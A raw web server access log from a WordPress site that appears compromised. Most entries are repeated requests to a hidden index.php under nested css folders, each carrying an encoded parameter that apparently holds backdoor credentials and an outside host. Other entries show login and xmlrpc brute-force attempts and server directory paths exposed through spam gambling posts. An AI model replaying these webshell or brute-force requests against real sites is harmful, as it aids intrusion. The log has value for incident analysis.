142.4.205.1 - - [16/Oct/2025:11:47:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333232392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393632392q3639346433653834313865303239323830653362613638653234653961393836222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:11:47:17 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:47:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333234392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393634392q3734623564376264313432613664376639313130633034376632356437323262222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.48 - - [16/Oct/2025:11:48:34 -0400] "GET /market/2274496626.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.65.195 - - [16/Oct/2025:11:48:36 -0400] "GET /?_g=1857365 HTTP/1.0" 200 25315 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:11:47:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333236392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393636392q6633623033363130376139363539383832373435613961343737626334326164222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [16/Oct/2025:11:49:06 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin/css/css/css HTTP/1.0" 200 7157 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin/css/css" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:11:48:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333238392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393638392q6361383165613063323831663361636164383132386131306462383638633166222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
161.248.188.190 - - [16/Oct/2025:11:49:18 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
161.248.188.190 - - [16/Oct/2025:11:49:19 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "https://academiedumarketing.com/wp-login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
142.4.205.1 - - [16/Oct/2025:11:48:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333330392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393730392q3133353062663736313232323866306132626665316333366335636335353737222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:48:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333332392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393732392q6433323335656133376162616563653166623562613964653635346261363432222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:11:48:49 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:49:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333334392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393734392q3262353364383431303063303035393030636135653163613462616139626161222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:49:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333336392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393736392q3230653138613835643835366232393163356633353537616538613332396566222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [16/Oct/2025:11:50:29 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/home-link HTTP/1.0" 200 7122 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:11:49:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333338392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393738392q3466333664363162363333353034353266376337343833396232656131323164222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:50:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333430392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393830392q3736316362346166366130393632666462623530363365373366303333653338222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:11:50:17 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:50:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333432392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393832392q3333343531373264653231633061623532376434313832303164333334386638222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
103.175.163.22 - - [16/Oct/2025:11:51:35 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; FSJB; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:11:50:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333434392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393834392q3838663831353364333665663132363935346237313863643430313831623736222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.145.188 - - [16/Oct/2025:11:51:53 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2024/03 HTTP/1.0" 200 6775 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2024" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
103.175.163.22 - - [16/Oct/2025:11:52:04 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4945 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; FSJB; rv:11.0) like Gecko"
51.195.74.55 - - [16/Oct/2025:11:52:07 -0400] "GET /admin.php?520 HTTP/1.0" 200 96667 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:11:51:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333436392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393836392q3835373839633533653031636461626265613466653132393131343063376330222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:51:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333438392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393838392q6664333261613562346539353764313833356437373263393330366665626265222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
51.195.74.55 - - [16/Oct/2025:11:52:39 -0400] "GET /about.php?520 HTTP/1.0" 403 4945 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
103.175.163.22 - - [16/Oct/2025:11:52:39 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; FSJB; rv:11.0) like Gecko"
69.197.179.242 - - [16/Oct/2025:11:51:48 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:51:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333530392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393930392q6564353634303236623364333765383864623930653133306532316530646330222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:52:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333532392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393932392q6130373834353962663730396131393365653839363362643233303064323537222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.59 - - [16/Oct/2025:11:53:15 -0400] "GET /market/2274785705.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
114.119.128.196 - - [16/Oct/2025:11:53:16 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/js/plupload HTTP/1.0" 200 7377 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/js" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:11:52:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333534392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393934392q3263336466306666396535646437343061303461363364656564383335313336222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:52:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333536392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393936392q3833366139316236653134373436663331356230303230373662353135326463222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:53:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333538392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632393938392q3431613666626537353563303564643733353565623438353438376531393538222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:53:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333630392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303030392q3432616166633531353339616666353830363161646232316437333161376438222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.152.60 - - [16/Oct/2025:11:54:41 -0400] "GET /2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2021/07 HTTP/1.0" 200 6776 "https://academiedumarketing.com/2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2021" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:11:53:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333632392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303032392q6165316539666638316339306161613335356436343436346433396437613063222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [16/Oct/2025:11:54:53 -0400] "GET /robots.txt HTTP/1.0" 200 4352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [16/Oct/2025:11:54:53 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F10 HTTP/1.0" 200 6775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [16/Oct/2025:11:54:54 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F08 HTTP/1.0" 200 6776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [16/Oct/2025:11:54:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333634392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303034392q3637656162616165346630326130333138343063643430393737323232383038222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:54:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333636392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303036392q3434393738343261633032663561383933353230623633353163373466636536222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:54:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333638392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303038392q3731633065643761626362363230306336376130343966396265636338373837222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.42.61.4 - - [16/Oct/2025:11:56:03 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko"
142.4.205.1 - - [16/Oct/2025:11:55:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333730392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303130392q3335316665363066363065303363343134363532666330353439373738373633222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.131.235 - - [16/Oct/2025:11:56:09 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl HTTP/1.0" 200 7143 "https://academiedumarketing.com/2025/10/03/best-strategies-for-togel-players/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.189 - - [16/Oct/2025:11:56:19 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F09 HTTP/1.0" 200 6776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [16/Oct/2025:11:56:19 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/1.0" 200 6774 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [16/Oct/2025:11:55:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333732392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303132392q6562373866663032306561633733343031636637636565643539663530653939222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:55:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333734392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303134392q6131623131316162306531333531646365386265323838353539326237366462222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [16/Oct/2025:11:56:55 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F07 HTTP/1.0" 200 6776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [16/Oct/2025:11:56:55 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F02 HTTP/1.0" 200 6775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [16/Oct/2025:11:56:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333736392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303136392q6166643739363434316339636538386530643632326130623466363237356363222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.138.172 - - [16/Oct/2025:11:57:27 -0400] "GET /2019/09/06/hello-world?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/sodium_compat HTTP/1.0" 200 7323 "https://academiedumarketing.com/2019/09/06/hello-world?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:11:56:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333738392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303138392q3263653437333663313264633036623363386237386533656661653831373535222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
